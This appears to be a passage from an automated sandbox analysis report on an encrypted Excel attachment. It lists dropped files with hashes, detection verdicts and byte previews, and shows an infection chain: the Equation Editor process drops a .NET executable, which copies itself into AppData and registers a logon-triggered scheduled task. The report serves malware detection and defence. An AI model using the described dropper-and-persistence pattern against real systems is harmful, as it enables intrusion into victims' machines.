                                                              SSDEEP:96:a4aE1KmC2pDjl7+EKygWPao3+3qa9rwJDWeuhiyFBOLQ35Op2TVmlVb5VKS:a4aUKf2L7JKyfAqa9MtFuw0BoQ3wqmrn
                                                              MD5:5E4CB8E9E2D4F34BD27D8A5387155574
                                                              SHA1:24BB77A797B14736360DB4C397DA4F2E973F7BF4
                                                              SHA-256:88BF397EF3E7AF934522D5F728FA1781A21212C7DB987EB1AAE20AF238145EC9
                                                              SHA-512:BC3B3B2E5568590B135C8BB24688DA605CBB4185984866CFB8B061067357BE606DAF25588B41519D293657CEFADCF636BD1B00331E76AA4EB923DC2F416BC54E
                                                              Malicious:false
                                                              Preview: ......JFIF.............C....................................................................C.......................................................................\...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....-...N.......v3...w.^.X...FN{...J..Z~...q&..F.o........`A*7`..~.....O.vz...m....\../. .:.@?.i.....uk..r...y.I$..r.).8P.2.9..b...!/wC..J..A...E.{...j.c3j./..A(.t.....6..wI....w.Q.+.*.h..a......T(..;.....M.~...4.y.59..9...0...../L.'?6....d....oo&.w"Z.[u{....I...do@rry<..W........GK.y.......4...\.....~.r..e$d`.A.c...........|;.>..]...L....X;}q.,..._.m[.W...M.
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E7BF4C9.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 145 x 220, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):18201
                                                              Entropy (8bit):7.965957747813941
                                                              Encrypted:false
                                                              SSDEEP:384:U798+QVwnPFn+gZ4ie8vVnhQWdBkUFb0IRH5vGHUFVTlH:UgVwP7QqnhBBNb0IRH9GSRlH
                                                              MD5:97398F0E0103D87A1586FBA7A44D5DA7
                                                              SHA1:1A757D6D6776C84512483D678C7FA691177129B7
                                                              SHA-256:40B2312686B6895083E9764121A8223E157F3B0C3BA0B954FAE5E1D5B0086911
                                                              SHA-512:633BD01A8187FA175F1C9143AB8C918319B2481EDCD5A6058179509AFAC1A0C464437E9EF3543FEBFFE2C819C130817ACAF42FCFDF7232C33B189CD8A659E1AB
                                                              Malicious:false
                                                              Preview: .PNG........IHDR.............p.C.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!........F.IDATx^....$...`...g.33..xf<3....tffffffffffff.~...&r.j.....UD..TW...S*.).u..].z.A..t.~t.lD....7.q.;..NC?..6*.....C..F....%.A....:.V.a/...c`e.t..,.^@.Q..... ZY........%.A...{..D..+K..he......W.....'<a....>........g.}...g......?.........E/z..W.j.....tx......./.9...~tx...0..w......p.....w..}.C.o|..;......?...G>.....|.....G?.....O...~.../|..o...'v...>...o}.[._.....9...........O.....|.(.z...?.........o.Nk.y. .*..}.s.O?..O..}.{k........................k_...|...W.bl.?.....oS.B.}.3..Nv........ x..5......>.....@{..^0.x..#..r....w}Nt..._.........p..T.:.p..\ex..?.w.x..nu..P.:...l.....?..?..p}...<..&7..@.........o8...=..Ap..u..........s....i`...o=.....p.{.c...q.[.bx.#.1..u...{..tx...8..[....^...p..^vl.@9....{..Z..)Oy..1...t..u.j.......<...?..O......u.'>..o{....<.9....?}.......7.x..4..~...z...~........=U..8.1......nw..X.
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A23758C.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):79394
                                                              Entropy (8bit):7.864111100215953
                                                              Encrypted:false
                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                              Malicious:false
                                                              Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB288440.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 145 x 220, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):18201
                                                              Entropy (8bit):7.965957747813941
                                                              Encrypted:false
                                                              SSDEEP:384:U798+QVwnPFn+gZ4ie8vVnhQWdBkUFb0IRH5vGHUFVTlH:UgVwP7QqnhBBNb0IRH9GSRlH
                                                              MD5:97398F0E0103D87A1586FBA7A44D5DA7
                                                              SHA1:1A757D6D6776C84512483D678C7FA691177129B7
                                                              SHA-256:40B2312686B6895083E9764121A8223E157F3B0C3BA0B954FAE5E1D5B0086911
                                                              SHA-512:633BD01A8187FA175F1C9143AB8C918319B2481EDCD5A6058179509AFAC1A0C464437E9EF3543FEBFFE2C819C130817ACAF42FCFDF7232C33B189CD8A659E1AB
                                                              Malicious:false
                                                              Preview: .PNG........IHDR.............p.C.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!........F.IDATx^....$...`...g.33..xf<3....tffffffffffff.~...&r.j.....UD..TW...S*.).u..].z.A..t.~t.lD....7.q.;..NC?..6*.....C..F....%.A....:.V.a/...c`e.t..,.^@.Q..... ZY........%.A...{..D..+K..he......W.....'<a....>........g.}...g......?.........E/z..W.j.....tx......./.9...~tx...0..w......p.....w..}.C.o|..;......?...G>.....|.....G?.....O...~.../|..o...'v...>...o}.[._.....9...........O.....|.(.z...?.........o.Nk.y. .*..}.s.O?..O..}.{k........................k_...|...W.bl.?.....oS.B.}.3..Nv........ x..5......>.....@{..^0.x..#..r....w}Nt..._.........p..T.:.p..\ex..?.w.x..nu..P.:...l.....?..?..p}...<..&7..@.........o8...=..Ap..u..........s....i`...o=.....p.{.c...q.[.bx.#.1..u...{..tx...8..[....^...p..^vl.@9....{..Z..)Oy..1...t..u.j.......<...?..O......u.'>..o{....<.9....?}.......7.x..4..~...z...~........=U..8.1......nw..X.
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0003741.jpeg
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 132x92, frames 3
                                                              Category:dropped
                                                              Size (bytes):5108
                                                              Entropy (8bit):7.8542722177825945
                                                              Encrypted:false
                                                              SSDEEP:96:a4aE1KmC2pDjl7+EKygWPao3+3qa9rwJDWeuhiyFBOLQ35Op2TVmlVb5VKS:a4aUKf2L7JKyfAqa9MtFuw0BoQ3wqmrn
                                                              MD5:5E4CB8E9E2D4F34BD27D8A5387155574
                                                              SHA1:24BB77A797B14736360DB4C397DA4F2E973F7BF4
                                                              SHA-256:88BF397EF3E7AF934522D5F728FA1781A21212C7DB987EB1AAE20AF238145EC9
                                                              SHA-512:BC3B3B2E5568590B135C8BB24688DA605CBB4185984866CFB8B061067357BE606DAF25588B41519D293657CEFADCF636BD1B00331E76AA4EB923DC2F416BC54E
                                                              Malicious:false
                                                              Preview: ......JFIF.............C....................................................................C.......................................................................\...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....-...N.......v3...w.^.X...FN{...J..Z~...q&..F.o........`A*7`..~.....O.vz...m....\../. .:.@?.i.....uk..r...y.I$..r.).8P.2.9..b...!/wC..J..A...E.{...j.c3j./..A(.t.....6..wI....w.Q.+.*.h..a......T(..;.....M.~...4.y.59..9...0...../L.'?6....d....oo&.w"Z.[u{....I...do@rry<..W........GK.y.......4...\.....~.r..e$d`.A.c...........|;.>..]...L....X;}q.,..._.m[.W...M.
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1513BF7.jpeg
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 138x95, frames 3
                                                              Category:dropped
                                                              Size (bytes):5312
                                                              Entropy (8bit):7.87002614928457
                                                              Encrypted:false
                                                              SSDEEP:96:aQEbvekDqDOhVftC8Oyl4UDAF30vhbt304R5h6pj19nrGtSu:aQimLDChtCOlCshbtV5h6B1J8Su
                                                              MD5:4A55E9D2A20FED087D9D353A1B8B225E
                                                              SHA1:8575304CF3E0891BEE446131C9232F4F0AF6FF8D
                                                              SHA-256:8A1747DC2F352FA0CB9EA6AE9679805698B1530FBD1AFA3EA7BB04B223076BBD
                                                              SHA-512:647AE5B916FE1BE38FBDE28B43D20527A8C7CEFA60081625754F96CA1684017E5D04E863EE7FA78B5D7143433204991FB37EE91D5D445C1A87B08A6DE27E2085
                                                              Malicious:false
                                                              Preview: ......JFIF.............C....................................................................C......................................................................._...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......v..|_.O...Noo.....!..Q.9.........?..{j....d...f.H9....q.T?g..N.?.....~.}6...C.!..e;H.pkGV.....-^=s....p...\...C.......#.......J.C..J...n+e..m..o......9.G.JZYd..@..$...A?@MU..~..C,..yR..S9.\#..~~..P.._...X^....ngu....3..!........l.`qRj.....U.#....\.,....v.........F1.Z.7..o....e.6.irk......%.7..F...m..q..R.Ki..x..;./.h..*..l..wd|..7....u.]....&...D ...
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCC36C7B.jpeg
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                              Category:dropped
                                                              Size (bytes):14198
                                                              Entropy (8bit):7.916688725116637
                                                              Encrypted:false
                                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                              Malicious:false
                                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0881DE8.jpeg
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                              Category:dropped
                                                              Size (bytes):14198
                                                              Entropy (8bit):7.916688725116637
                                                              Encrypted:false
                                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                              Malicious:false
                                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF266AC3.png
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):51166
                                                              Entropy (8bit):7.767050944061069
                                                              Encrypted:false
                                                              SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                              MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                              SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                              SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                              SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                              Malicious:false
                                                              Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                              C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp
                                                              Process:C:\Users\Public\vbc.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1624
                                                              Entropy (8bit):5.150292081208383
                                                              Encrypted:false
                                                              SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBsKatn:cbhZ7ClNQi/rydbz9I3YODOLNdq3SV
                                                              MD5:CD76BBF4D22F13A29D1A9059BEDF03CB
                                                              SHA1:FB5C2F4B21003958EADE9F17C05283799F43BD2C
                                                              SHA-256:87D71BF9CFBDB2FA69F3F7948ECFBBB0AEE85E8056D258EEB8F807F4F50BA6F7
                                                              SHA-512:8F02F9E991043D7ABE367AB6EF09DC3D4B400578E6D4FD552D3ABE9EE4F4640FF58A239CA414CFBDCD8CBF07EF5124D12F4B06BA0A18CB7E0E55C864F3E57627
                                                              Malicious:true
                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\Logs\user\KB_6319896.dat
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):19
                                                              Entropy (8bit):3.9321380397593764
                                                              Encrypted:false
                                                              SSDEEP:3:L0QSn:L0QS
                                                              MD5:9CFA2706DC0DC2AC9233FF90142911F1
                                                              SHA1:3B364890D41DFE1E111E1F7939ACED82D1D69F9A
                                                              SHA-256:E864AD2555E36157F6ED3139693BB50E4EE6AAF0F4C517A77A4C272BF5341565
                                                              SHA-512:85A5C00A4C1536417162951411677C3E5368C9F8F24C074DB578A6086B73EEA50FC3EEAEE7551D790693048AACECA5707FAE76660C633F2FBAC920D8ACF22F70
                                                              Malicious:false
                                                              Preview: . Ep`..[smtpsvc] .a
                                                              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):2808
                                                              Entropy (8bit):7.012278113302776
                                                              Encrypted:false
                                                              SSDEEP:48:IkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5lkR5i:xwwwwwwwwwwwwk
                                                              MD5:41D55AA24937A5DB22070AA73DBC0FE4
                                                              SHA1:F5109294C3AFDD40B0D1EB5690C9699BABCE8223
                                                              SHA-256:7974769FC920E4269D7A814683252DEC14074F16AA51978D23D7A4CEA5F558F3
                                                              SHA-512:38D1BC3F67D8F02A139F7C40923091158CF55564912899D68F8C9DFCAA60EB0032699B2B2DF626FD221E8F821A41100DEE5ED084C806B1F2C75A2A04FBF84D06
                                                              Malicious:false
                                                              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6...T....+5.1............r.P.V..+..(.*2d.f... ..q.. 7iO.+..c.....!.'.*..mL|XGj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h.P.vY.........S.5.6.C4..E.Y.|........).zs...w.gl..\.G..J.M.vES.0....P.:..6..
                                                              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              File Type:Non-ISO extended-ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):8
                                                              Entropy (8bit):3.0
                                                              Encrypted:false
                                                              SSDEEP:3:vc89P:VF
                                                              MD5:751ABF15332A62576B8469C2FA24F5A1
                                                              SHA1:CA5B91CC06A9EE30CA5BD0C297E11584CF934B7D
                                                              SHA-256:9B2E64C7B61A25BDEAAD197524C10288EE328C9C0043279D099ABDC588C4CE19
                                                              SHA-512:A38AFC0D3E4CC268943F6712FC2A0FA8D0A7CF38F2B8A94A2556ADAC639E94C47BDBE56C8E84CBEA1968F2D64A7F7E779C331347ABDABBBDDE254A118DC83C8E
                                                              Malicious:true
                                                              Preview: eo.Y...H
                                                              C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exe
                                                              Process:C:\Users\Public\vbc.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1865728
                                                              Entropy (8bit):7.042310357804828
                                                              Encrypted:false
                                                              SSDEEP:49152:9Ni8vaKvPuXtaD5LNaw/RRMbBRtlxaJvxdrLBF+F36q:Bzv4w/RRMbBRZaJvz3XO35
                                                              MD5:A74ECE32BC1B6DB38A2D379C7FC78D2C
                                                              SHA1:25EA63E67B842641E57BC5B405EA51EC9C6BEB5B
                                                              SHA-256:20E490AFBA639EA251A2F095A8B9B85E1B9922FF6D8B6F47CEB567BA62521A28
                                                              SHA-512:63A026DEDC6B2478A0CA7625534045E98334185BFEA76B7DAA74C1FE8CB32757AB26F97ACE14B8400EA70DF8FDDD0F10DBA51041F2444534A11BF49F41746672
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Joe Sandbox View:
                                                              • Filename: J62DQ7fO0b.exe, Detection: malicious, Browse
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o`................................. ........@.. ....................................@.....................................W.... ..t............................................................................ ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...t.... ......................@..@........................H............p..........D...............................................z.(......}.....( ...o!...}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s"...z.2.{.....f...*....0..<........{......3..{....( ...o!...3...}......+..s.......{....}..
                                                              C:\Users\user\Desktop\~$Files Specification.xlsx
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):330
                                                              Entropy (8bit):1.4377382811115937
                                                              Encrypted:false
                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                              Malicious:false
                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                              C:\Users\Public\vbc.exe
                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1865728
                                                              Entropy (8bit):7.042310357804828
                                                              Encrypted:false
                                                              SSDEEP:49152:9Ni8vaKvPuXtaD5LNaw/RRMbBRtlxaJvxdrLBF+F36q:Bzv4w/RRMbBRZaJvz3XO35
                                                              MD5:A74ECE32BC1B6DB38A2D379C7FC78D2C
                                                              SHA1:25EA63E67B842641E57BC5B405EA51EC9C6BEB5B
                                                              SHA-256:20E490AFBA639EA251A2F095A8B9B85E1B9922FF6D8B6F47CEB567BA62521A28
                                                              SHA-512:63A026DEDC6B2478A0CA7625534045E98334185BFEA76B7DAA74C1FE8CB32757AB26F97ACE14B8400EA70DF8FDDD0F10DBA51041F2444534A11BF49F41746672
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Joe Sandbox View:
                                                              • Filename: J62DQ7fO0b.exe, Detection: malicious, Browse
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o`................................. ........@.. ....................................@.....................................W.... ..t............................................................................ ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...t.... ......................@..@........................H............p..........D...............................................z.(......}.....( ...o!...}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s"...z.2.{.....f...*....0..<........{......3..{....( ...o!...3...}......+..s.......{....}..

                                                              Static File Info

                                                              General

                                                              File type:CDFV2 Encrypted
                                                              Entropy (8bit):7.996574201988985
                                                              TrID:
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                              File name:Files Specification.xlsx
                                                              File size:2326528
                                                              MD5:3f313ed62b62d4b5eb276563ca6279b1
                                                              SHA1:ad59b8e880ac245254e71f174fc0b208c810cf6f
                                                              SHA256:175deb6bade5be1402da4fbb5d154e07ce7dba53f7a2a68fdf210aadb63683ff
                                                              SHA512:1c8cddf31ece5a535d1251f8e22a79c85d83f59c3b7570596e5ff7ce3f7ad673e6f14cf4571f4b2463a6fabdde60fde82ff4474126b052672455128acd249f85
                                                              SSDEEP:49152:7gbQngkM061/vNtMr16/mQuJvM/SihEmogebWygehAwd:7+QgkgorA+vKBjeqHVwd
                                                              File Content Preview:........................>...................$....................................................................................................................................... ...!..."...#...$...%...&...........z......................................

                                                              File Icon

                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                              Static OLE Info

                                                              General

                                                              Document Type:OLE
                                                              Number of OLE Files:1

                                                              OLE File "Files Specification.xlsx"

                                                              Indicators

                                                              Has Summary Info:False
                                                              Application Name:unknown
                                                              Encrypted Document:True
                                                              Contains Word Document Stream:False
